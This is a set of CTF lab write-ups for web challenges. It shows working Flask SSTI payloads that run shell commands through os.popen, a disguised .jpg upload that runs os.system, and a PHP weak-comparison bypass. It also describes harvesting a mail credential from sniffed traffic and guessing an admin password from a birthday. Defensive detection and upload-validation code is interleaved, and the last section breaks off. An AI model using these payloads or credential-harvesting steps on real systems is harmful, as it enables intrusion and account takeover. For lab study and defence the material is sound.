
Question name: Simple_SSTI_2

Question writeup: Start the question scenario, obtain the shooting-range website and visit it. The page says that the URL needs a flag parameter.

According to the question content, this is an SSTI vulnerability, so we construct an SSTI payload. Passing flag={{3+2}} produces an error page, which reveals that the backend is Flask:

http://114.67.246.176:19131/?flag={{3+2}}

We also try flag={{3*2}}, and the page displays 6, which proves that the system has an SSTI vulnerability:

http://114.67.246.176:19131/?flag={{3*2}}

Viewing Flask's configuration through the config variable shows nothing usable:

http://114.67.246.176:19131/?flag={{config}}

Using {{ config.__class__.__init__.__globals__['os'].popen('ls ./').read() }} we read the website's directory listing and find some folders. Entering them one by one, the first one, app, contains the flag.

##__class__: views the class to which a variable belongs; from the previous variable form we obtain its class.
##__init__: initialises the class; the returned type is a function.
##__globals__[]: used as function_name.__globals__, it returns the modules, methods and all variables available in the namespace where the function is defined.
##os.popen(): opens a pipe to a command.
##open(): opens a file and returns the file object.

http://114.67.246.176:19131/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20./%27).read()%20}}

With {{ config.__class__.__init__.__globals__['os'].popen('ls ./app').read() }} we list the app directory and find a flag file:

http://114.67.246.176:19131/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20./app%27).read()%20}}

With {{ config.__class__.__init__.__globals__['os'].popen('cat ./app/flag').read() }} we read the flag content:

http://114.67.246.176:19131/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20./app/flag%27).read()%20}}

Finally get flag: flag{fcf301ac393f2215b3664d749c2d875e}

Question name: Flask_FileUpload

Question writeup: http://114.67.246.176:12896/

Viewing the source of the file upload page shows that only files whose names end in jpg or png may be uploaded, and that the file content will be executed by python:

view-source:http://114.67.246.176:12896/

The system function converts a string into a command and runs it on the server. The principle: each time the system function is executed it creates a child process to run the command line on the system, and the result of the child process cannot affect the main process. os.system is the most basic method of the os module; the other methods are generally wrappers around it. Here we use the system function from python's os package to read the flag. Upload a test.jpg that lists the website's root directory:

import os
os.system('ls /')

The upload succeeds; checking the source code shows the root directory of the system, and the root directory contains a flag file.

View flag:

import os
os.system('cat /flag')

The upload succeeds, and checking the source code shows the flag content.

Finally flag: flag{e541f3aadc9575ed6b6832b7ca34e327}

Question name: Calculator

Question content: You can get the flag

Question writeup: Start the question scenario, obtain the shooting-range website and visit it. The page requires the correct verification code to obtain the flag. Through the F12 element inspector, the page source is found to include a code.js:

http://114.67.246.176:16139/

Viewing code.js reveals the flag content:

http://114.67.246.176:16139/js/code.js

Finally got flag: flag{e5d6e3fe29850f7fec9ea6ef55f86050}

Question name: GET

Question content: flag{}

Question writeup: Start the question scene, obtain the shooting-range website and visit it. A php code is displayed on the page:

http://114.67.246.176:13678/

A simple code audit shows that a what parameter is passed by the http GET method; when the what parameter equals flag, the flag is output. So construct what=flag to obtain the flag:

http://114.67.246.176:13678/?what=flag

Flag: flag{54790dba4001f7ded2ebde88ca82a3ca}

Question name: POST

Question writeup: Start the question scenario, obtain the shooting-range website and visit it. A php code is shown on the page:

http://114.67.246.176:15053/

A simple code audit shows that a what parameter is passed by the http POST method; when the what parameter equals flag, the flag is output. So construct the request:

http://114.67.246.176:15053/ with POST body what=flag

You can get the flag. Final flag: flag{4335dd4cc76278468578d8026fb121ae}
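From the defender's side, the probes used in the Simple_SSTI_2 section above ({{3*2}}, {{config}}, and the __class__.__init__.__globals__ walk to os.popen) are easy to pick out of web server logs. The Python script below is an added example, not code from this writeup or from the challenge: the log lines are constructed in Combined Log Format to mirror those requests, and the function names (classify_request, scan_access_log) and indicator list are my own.

```python
"""Detection of Jinja2/Flask SSTI probes in web access logs.

Added example (not part of the original writeup). The sample log lines are
constructed; they mirror the kind of requests used in the Simple_SSTI_2
walkthrough so a defender can see what the probe looks like server-side.
"""
import re
from urllib.parse import unquote

# Indicators of a template-injection probe or of the __class__/__globals__
# attribute walk used to reach os.popen from the Flask config object.
SSTI_PATTERNS = {
    "template_expr": re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S),
    "arith_probe":   re.compile(r"\{\{\s*\d+\s*[*+\-/]\s*\d+\s*\}\}"),
    "dunder_walk":   re.compile(r"__(class|init|globals|subclasses|mro|builtins|import)__"),
    "os_execution":  re.compile(r"\b(popen|system|subprocess|os)\b"),
    "config_leak":   re.compile(r"\bconfig\b"),
}

# Combined Log Format: ip - user [time] "METHOD PATH PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def decode_path(path: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads (%257B%257B) are seen."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify_request(path: str) -> list:
    """Return the names of the SSTI indicators present in a request path."""
    decoded = decode_path(path)
    hits = [name for name, rx in SSTI_PATTERNS.items() if rx.search(decoded)]
    # A bare word like "config" or "os" in an ordinary URL is noise: the weak
    # indicators only count when a template expression is present as well.
    if "template_expr" not in hits:
        hits = [h for h in hits if h not in ("os_execution", "config_leak")]
    return hits

def scan_access_log(lines) -> list:
    """Return (ip, decoded_path, indicators) for every request that looks like an SSTI probe."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = classify_request(m.group("path"))
        if indicators:
            findings.append((m.group("ip"), decode_path(m.group("path")), indicators))
    return findings

# Constructed sample log (not captured from the challenge server).
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Dec/2021:17:07:53 +0800] "GET /?flag=hello HTTP/1.1" 200 312',
    '10.0.0.5 - - [15/Dec/2021:17:07:54 +0800] "GET /?flag={{3*2}} HTTP/1.1" 200 298',
    '10.0.0.5 - - [15/Dec/2021:17:07:55 +0800] "GET /?flag={{config}} HTTP/1.1" 200 1540',
    '10.0.0.5 - - [15/Dec/2021:17:07:56 +0800] "GET /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20./%27).read()%20}} HTTP/1.1" 200 411',
    '10.0.0.9 - - [15/Dec/2021:17:08:01 +0800] "GET /static/config.js HTTP/1.1" 200 8801',
]

if __name__ == "__main__":
    for ip, path, indicators in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {','.join(indicators):45s} {path}")
```

Only three of the five sample requests are flagged: the plain flag=hello request and the legitimate /static/config.js fetch are not, because "config" on its own is only counted once a {{ ... }} expression is present. The real fix is on the application side (never build a template string from request data; pass the value into render_template_string as a variable instead), but the log scan tells you whether anyone has already been probing.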
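The Flask_FileUpload challenge above only checks that the file name ends in jpg or png and then hands the body to python, which is why a test.jpg containing os.system(...) runs. The following Python code is an added example, not part of the writeup and not the challenge's own source: it shows the check a server should apply instead (last-suffix allowlist, magic-byte sniffing, a size limit, a random server-chosen storage name, and the body kept as opaque bytes). The function names, the size limit and the sample bodies are constructed.

```python
"""Server-side validation of image uploads.

Added example (not the challenge's code). The weak check accepted anything
named *.jpg / *.png and then executed the body; the hardened check treats
the body as opaque bytes and never lets the client pick the stored name.
"""
import os
import secrets

# Extension -> magic bytes the body must start with.
ALLOWED = {
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed limit for this example

class UploadRejected(ValueError):
    pass

def extension_only_check(filename: str) -> bool:
    """The weak check (illustrative): accept anything whose name ends in .jpg/.png."""
    return filename.lower().endswith((".jpg", ".png"))

def validate_upload(filename: str, data: bytes) -> str:
    """Return the canonical extension if the upload is acceptable, else raise UploadRejected."""
    # 1. Refuse any directory component the client sent (../x.png, dir\x.png).
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or not base:
        raise UploadRejected("path components are not allowed")
    # 2. Allowlist on the *last* suffix only (shell.php.jpg still ends in .jpg,
    #    but it will be stored under our own name and never executed).
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not allowed")
    # 3. Size bound before looking at content.
    if not data or len(data) > MAX_BYTES:
        raise UploadRejected("empty or oversized upload")
    # 4. The body must start like the image type it claims to be, so a python
    #    script renamed to test.jpg is rejected regardless of its extension.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise UploadRejected("content does not match declared image type")
    return ".jpg" if ext == ".jpeg" else ext

def is_accepted(filename: str, data: bytes) -> bool:
    """Convenience wrapper: True if validate_upload() accepts the file."""
    try:
        validate_upload(filename, data)
        return True
    except UploadRejected:
        return False

def safe_storage_name(ext: str) -> str:
    """Random server-chosen file name; the client's name is discarded entirely."""
    return secrets.token_hex(16) + ext

def store_upload(filename: str, data: bytes, upload_dir: str) -> str:
    """Validate, then write the bytes to disk under a random name. Never execute them."""
    ext = validate_upload(filename, data)
    name = safe_storage_name(ext)
    with open(os.path.join(upload_dir, name), "wb") as fh:
        fh.write(data)
    return name

# Constructed sample bodies.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 32
PY_BODY = b"import os\nos.system('ls /')\n"   # the test.jpg body from the writeup

if __name__ == "__main__":
    print("weak check accepts test.jpg:", extension_only_check("test.jpg"))
    print("hardened check accepts test.jpg:", is_accepted("test.jpg", PY_BODY))
    print("hardened check accepts real png:", is_accepted("photo.png", PNG_SAMPLE))
```

Magic-byte sniffing is a filter, not a proof that the file is a harmless image (a polyglot can carry a valid PNG header and other content after it), which is why the last two design points matter more than the first: the stored name is generated by the server, and nothing on the server ever reads the upload as code.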

Question name: Contradictory

Question writeup: Start the question scenario, obtain the shooting-range website and visit it. The page is a php code.

A simple analysis of the code shows that a parameter num is passed and that it goes through the function is_numeric. This function detects whether a variable is a number or a numeric string: if it is, it returns TRUE, otherwise it returns FALSE.

The statement means that the num parameter passed in must not be a number or numeric string, and at the same time must be equal to 1.

The check num==1 uses two equal signs, which is a weak type comparison: if the two sides of the equal sign have different types, they are converted to the same type before being compared.

Under weak type comparison, when a string is compared with a number the string is converted into a number, keeping only the digits before the first letter. For example, 123ab7c is converted to 123 and ab7c is converted to 0 (no digits before the letters gives 0). So construct num=1a to obtain the flag:

http://114.67.246.176:16671/?num=1a
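To make the num=1a trick concrete, here is an added Python model of the PHP 7 rules it relies on; it is not from the writeup and it is not PHP itself. is_numeric() rejects "1a", but == converts the string to its leading number, so "1a" == 1 holds and the condition !is_numeric($num) && $num == 1 is satisfied; a strict === comparison (or an explicit integer check) leaves no string that passes both tests. The php_* function names are mine. One caveat worth knowing: PHP 8 changed this comparison so that 1 == "1a" is false, so the trick depends on the PHP version the challenge runs.

```python
"""Model of PHP 7 loose comparison between strings and integers.

Added example (not from the writeup, not real PHP). It reproduces just enough
of PHP 7's is_numeric() and == / === semantics to show why a non-numeric
string like "1a" can still equal the integer 1 under ==, and why === closes
the gap.
"""
import re

# PHP 7 numeric string: optional leading whitespace, sign, digits with an
# optional fraction and exponent, and nothing else.
NUMERIC_STRING = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")
# Leading-numeric prefix used when a string is converted to a number.
LEADING_NUMBER = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")

def php_is_numeric(value) -> bool:
    """is_numeric(): true for int/float or for a fully numeric string."""
    if isinstance(value, bool):
        return False
    if isinstance(value, (int, float)):
        return True
    return isinstance(value, str) and NUMERIC_STRING.match(value) is not None

def php_string_to_number(s: str):
    """PHP 7 conversion of a string to a number: its leading number, else 0."""
    m = LEADING_NUMBER.match(s)
    if not m:
        return 0
    text = m.group(0)
    return float(text) if any(c in text for c in ".eE") else int(text)

def php_loose_equals(a, b) -> bool:
    """== in PHP 7 for the string-vs-number case: the string side is converted."""
    if isinstance(a, str) and isinstance(b, (int, float)):
        return php_string_to_number(a) == b
    if isinstance(b, str) and isinstance(a, (int, float)):
        return a == php_string_to_number(b)
    return a == b

def php_strict_equals(a, b) -> bool:
    """=== requires identical type and value; no conversion happens."""
    return type(a) is type(b) and a == b

def challenge_check(num: str) -> bool:
    """The Contradictory condition: !is_numeric($num) && $num == 1 (PHP 7 model)."""
    return not php_is_numeric(num) and php_loose_equals(num, 1)

def hardened_check(num: str) -> bool:
    """Same intent with ===: a string can never be identical to the int 1."""
    return not php_is_numeric(num) and php_strict_equals(num, 1)

if __name__ == "__main__":
    for candidate in ("1", "1a", "123ab7c", "ab7c"):
        print(f"{candidate!r:10} is_numeric={php_is_numeric(candidate)!s:5} "
              f"=> {php_string_to_number(candidate)!r:6} "
              f"loose==1: {php_loose_equals(candidate, 1)!s:5} "
              f"challenge: {challenge_check(candidate)}")
```

The same leading-number rule is why 123ab7c becomes 123 and ab7c becomes 0, as the writeup says. In application code the fix is to compare with === after casting or validating the input explicitly, rather than relying on == to reject values that is_numeric() already rejected.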

Finally flag: flag{d95c4676fd2740a47e0393cf3364e3e3}

Question name: alert

Question content: flag{}

Question writeup: Start the scene, obtain the shooting-range website and open the page; it shows an endless pop-up window:

http://114.67.246.176:15743/

Viewing the web page source code, there is a unicode encoding starting with # in a comment. Decoding it with an online unicode tool gives the flag content:

http://tool.chinaz.com/tools/unicode.aspx

Finally flag: flag{09eec7218f68c04c87093052720c2c11}

Question name: You must let him stop

Question writeup: Start the question scene, obtain the shooting-range website and visit it; the page keeps refreshing pictures. Checking the page source does not reveal the flag, but there is a script that keeps refreshing the page. Capture the request with Burp Suite, send it repeatedly with Go in Repeater, and eventually the flag content appears on the response page.

Final flag: flag{ff9acfa3bbec16fe29b3ad5aef8f5421}

Question name: Social Worker - Preliminary collection

Question content: It is actually a miscellaneous question, so it can only be counted as social engineering. Adapted from a real case of that year.

Question writeup: Start the question scenario, obtain the shooting-range website and visit it; it is a drill brushing website:

http://114.67.246.176:13506/#goumai

A directory scan of the target website with Yujian finds an admin backend, and accessing the admin directory confirms that there is indeed a backend:

http://114.67.246.176:13506/admin/login.php

At the bottom of the homepage of the shooting range, the auxiliary program can be downloaded. I download it here.

After decompressing it, run the drill brushing program in a virtual machine.

After entering the QQ number and password and clicking start, analysing the packets with Wireshark, I found a pop-up window "Haha, I'm cheating with a little unique person".

Observing the packets carefully, there is a packet containing an email address and a Base64-encoded Pass.

Base64 decoding it gives what looks like a password, but it is too long; it appears to be an authorization code.

Open Foxmail to log in, enter the email address, and then enter the authorization code to log in.

View the inbox, sort by "subject", and find an email with useful information.

You can see that the sender is Mara.

The delivery time is 2021, and the email says she is now 20 years old, so she can be judged to have been born in 2001.

It also says that the birthday was two days ago, so the birthday can be judged to be February 6th.

Try logging in with username mara and password Mara's birthday as a number: 20010206.

Log in to the system successfully, check Website Settings --- player key in the website backend, and you can get the flag.

Finally get flag: flag{c4cba16a2f1a2d5aedf2ddd90a6bd04f}

Question name: game1

Question writeup: Start the question scene, obtain the shooting-range website and visit it. There is a game, and obtaining the highest score gets the flag. Any game can be played here:

http://114.67.246.176:17941/?s=1629731758384

Then, before the game ends, analyse it with Burp Suite; the result is found to depend on the values of the three parameters score, ip and sign:

http://114.67.246.176:17941/score.php?score=50&ip=183.221.17.223&sign=zMNTA===
